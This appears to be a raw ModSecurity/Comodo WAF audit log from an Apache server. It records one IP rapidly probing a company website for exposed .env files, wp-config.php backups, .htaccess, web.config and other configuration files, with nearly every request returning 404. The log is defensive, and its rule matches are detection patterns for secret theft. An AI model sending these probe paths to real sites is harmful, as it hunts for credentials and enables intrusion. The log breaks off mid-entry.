"DETECTION_ONLY" --697a8851-Z-- --c5e98953-A-- [17/Jun/2025:00:34:52.982355 +0530] aFBq1JVkCcfT-Z8NQYyU4QAAAAc 185.177.72.201 42744 127.0.0.1 7080 --c5e98953-B-- GET /.env.save.1 HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c5e98953-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c5e98953-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env.save.1"] [unique_id "aFBq1JVkCcfT-Z8NQYyU4QAAAAc"] Stopwatch: 1750100692979296 3113 (- - -) Stopwatch2: 1750100692979296 3113; combined=1740, p1=408, p2=1279, p3=0, p4=0, p5=53, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c5e98953-Z-- --2fd9f83b-A-- [17/Jun/2025:00:34:53.093113 +0530] aFBq1Sid3pHxA3RhGpzqPQAAAAk 185.177.72.201 42766 127.0.0.1 7080 --2fd9f83b-B-- GET /package.json.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2fd9f83b-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --2fd9f83b-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".json.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".json.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/package.json.old"] [unique_id "aFBq1Sid3pHxA3RhGpzqPQAAAAk"] Stopwatch: 1750100693089746 3421 (- - -) Stopwatch2: 1750100693089746 3421; combined=2073, p1=353, p2=1662, p3=0, p4=0, p5=58, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2fd9f83b-Z-- --c9f2de6c-A-- [17/Jun/2025:00:34:53.203512 +0530] aFBq1VJfblPUQiSn5r1hpgAAAAA 185.177.72.201 42768 127.0.0.1 7080 --c9f2de6c-B-- GET /web/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c9f2de6c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c9f2de6c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/web/.env"] [unique_id "aFBq1VJfblPUQiSn5r1hpgAAAAA"] Stopwatch: 1750100693200472 3104 (- - -) Stopwatch2: 1750100693200472 3104; combined=1779, p1=411, p2=1313, p3=0, p4=0, p5=54, sr=107, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c9f2de6c-Z-- --2acf1c1b-A-- [17/Jun/2025:00:34:53.313927 +0530] aFBq1ZlL5_2Zd8wUdfLJGAAAAAg 185.177.72.201 42786 127.0.0.1 7080 --2acf1c1b-B-- GET /sample.htaccess HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2acf1c1b-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --2acf1c1b-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/sample.htaccess"] [unique_id "aFBq1ZlL5_2Zd8wUdfLJGAAAAAg"] Stopwatch: 1750100693310979 3001 (- - -) Stopwatch2: 1750100693310979 3001; combined=1688, p1=395, p2=1235, p3=0, p4=0, p5=58, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2acf1c1b-Z-- --a434e972-A-- [17/Jun/2025:00:34:53.534986 +0530] aFBq1Sid3pHxA3RhGpzqPgAAAAk 185.177.72.201 42812 127.0.0.1 7080 --a434e972-B-- GET /protected/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a434e972-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a434e972-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/protected/.env"] [unique_id "aFBq1Sid3pHxA3RhGpzqPgAAAAk"] Stopwatch: 1750100693531594 3446 (- - -) Stopwatch2: 1750100693531594 3446; combined=2032, p1=433, p2=1543, p3=0, p4=0, p5=56, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a434e972-Z-- --e479a25b-A-- [17/Jun/2025:00:34:53.645730 +0530] aFBq1VJfblPUQiSn5r1hpwAAAAA 185.177.72.201 42818 127.0.0.1 7080 --e479a25b-B-- GET /wp-config.php_1 HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e479a25b-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e479a25b-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php_1"] [unique_id "aFBq1VJfblPUQiSn5r1hpwAAAAA"] Stopwatch: 1750100693642379 3405 (- - -) Stopwatch2: 1750100693642379 3405; combined=2015, p1=427, p2=1527, p3=0, p4=0, p5=61, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e479a25b-Z-- --6e907151-A-- [17/Jun/2025:00:34:53.756140 +0530] aFBq1ZlL5_2Zd8wUdfLJGQAAAAg 185.177.72.201 42836 127.0.0.1 7080 --6e907151-B-- GET /web.config.zip HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6e907151-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6e907151-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/web.config.zip"] [unique_id "aFBq1ZlL5_2Zd8wUdfLJGQAAAAg"] Stopwatch: 1750100693753157 3061 (- - -) Stopwatch2: 1750100693753157 3061; combined=1778, p1=374, p2=1329, p3=0, p4=0, p5=75, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6e907151-Z-- --a127ae5c-A-- [17/Jun/2025:00:34:54.087837 +0530] aFBq1hwcFb_n1P0IC9xlVwAAAAo 185.177.72.201 42868 127.0.0.1 7080 --a127ae5c-B-- GET /robots.txt.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a127ae5c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a127ae5c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".txt.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".txt.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/robots.txt.old"] [unique_id "aFBq1hwcFb_n1P0IC9xlVwAAAAo"] Stopwatch: 1750100694084226 3675 (- - -) Stopwatch2: 1750100694084226 3675; combined=2074, p1=431, p2=1575, p3=0, p4=0, p5=68, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a127ae5c-Z-- --4506340a-A-- [17/Jun/2025:00:34:54.308225 +0530] aFBq1k3CmevS3xeTzmojNwAAAAQ 185.177.72.201 42888 127.0.0.1 7080 --4506340a-B-- GET /local/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4506340a-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --4506340a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/local/.env"] [unique_id "aFBq1k3CmevS3xeTzmojNwAAAAQ"] Stopwatch: 1750100694304680 3632 (- - -) Stopwatch2: 1750100694304680 3632; combined=1941, p1=480, p2=1401, p3=0, p4=0, p5=59, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4506340a-Z-- --ab56be07-A-- [17/Jun/2025:00:34:54.749454 +0530] aFBq1k3CmevS3xeTzmojOAAAAAQ 185.177.72.201 42920 127.0.0.1 7080 --ab56be07-B-- GET /wp-config.php_Old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ab56be07-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ab56be07-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php_Old"] [unique_id "aFBq1k3CmevS3xeTzmojOAAAAAQ"] Stopwatch: 1750100694746435 3071 (- - -) Stopwatch2: 1750100694746435 3071; combined=1741, p1=397, p2=1291, p3=0, p4=0, p5=53, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ab56be07-Z-- --494c4052-A-- [17/Jun/2025:00:34:55.573160 +0530] aFBq103CmevS3xeTzmojOgAAAAQ 185.177.72.201 43022 127.0.0.1 7080 --494c4052-B-- GET /frontend/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --494c4052-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --494c4052-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/frontend/.env"] [unique_id "aFBq103CmevS3xeTzmojOgAAAAQ"] Stopwatch: 1750100695570111 3117 (- - -) Stopwatch2: 1750100695570111 3117; combined=1738, p1=409, p2=1273, p3=0, p4=0, p5=56, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --494c4052-Z-- --22348568-A-- [17/Jun/2025:00:34:55.684500 +0530] aFBq138PxMRZ7s11niQJ7gAAAAI 185.177.72.201 43028 127.0.0.1 7080 --22348568-B-- GET /config.ini.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --22348568-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --22348568-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".ini.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".ini.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.ini.old"] [unique_id "aFBq138PxMRZ7s11niQJ7gAAAAI"] Stopwatch: 1750100695680667 3887 (- - -) Stopwatch2: 1750100695680667 3887; combined=2254, p1=450, p2=1717, p3=0, p4=0, p5=86, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --22348568-Z-- --6bce7e02-A-- [17/Jun/2025:00:34:57.017243 +0530] aFBq2ZVkCcfT-Z8NQYyU6wAAAAc 185.177.72.201 43186 127.0.0.1 7080 --6bce7e02-B-- GET /database.php.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6bce7e02-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6bce7e02-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/database.php.old"] [unique_id "aFBq2ZVkCcfT-Z8NQYyU6wAAAAc"] Stopwatch: 1750100697013896 3401 (- - -) Stopwatch2: 1750100697013896 3401; combined=1987, p1=386, p2=1545, p3=0, p4=0, p5=56, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6bce7e02-Z-- --413f8a12-A-- [17/Jun/2025:00:34:57.127796 +0530] aFBq2X3hoSwVUy254pH0SwAAACQ 185.177.72.201 43192 127.0.0.1 7080 --413f8a12-B-- GET /web.config.tmp HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --413f8a12-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --413f8a12-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/web.config.tmp"] [unique_id "aFBq2X3hoSwVUy254pH0SwAAACQ"] Stopwatch: 1750100697124500 3351 (- - -) Stopwatch2: 1750100697124500 3351; combined=1997, p1=410, p2=1502, p3=0, p4=0, p5=85, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --413f8a12-Z-- --9de64779-A-- [17/Jun/2025:00:34:58.121467 +0530] aFBq2plL5_2Zd8wUdfLJJAAAAAg 185.177.72.201 43286 127.0.0.1 7080 --9de64779-B-- GET /.htaccess.zip HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9de64779-F-- HTTP/1.1 403 Forbidden Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "31b-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 795 Connection: close Content-Type: text/html --9de64779-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.htaccess.zip"] [unique_id "aFBq2plL5_2Zd8wUdfLJJAAAAAg"] Apache-Error: [file "mod_authz_core.c"] [line 879] [level 3] AH01630: client denied by server configuration: /var/www/vhosts/surbhiprintographics.com/httpdocs/.htaccess.zip Stopwatch: 1750100698120555 965 (- - -) Stopwatch2: 1750100698120555 965; combined=461, p1=396, p2=0, p3=0, p4=0, p5=65, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9de64779-Z-- --6ad2d061-A-- [17/Jun/2025:00:34:58.232051 +0530] aFBq2pVkCcfT-Z8NQYyU7gAAAAc 185.177.72.201 43312 127.0.0.1 7080 --6ad2d061-B-- GET /v2/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6ad2d061-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6ad2d061-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/v2/.env"] [unique_id "aFBq2pVkCcfT-Z8NQYyU7gAAAAc"] Stopwatch: 1750100698228810 3297 (- - -) Stopwatch2: 1750100698228810 3297; combined=1933, p1=398, p2=1476, p3=0, p4=0, p5=59, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6ad2d061-Z-- --34372a6c-A-- [17/Jun/2025:00:34:58.601089 +0530] 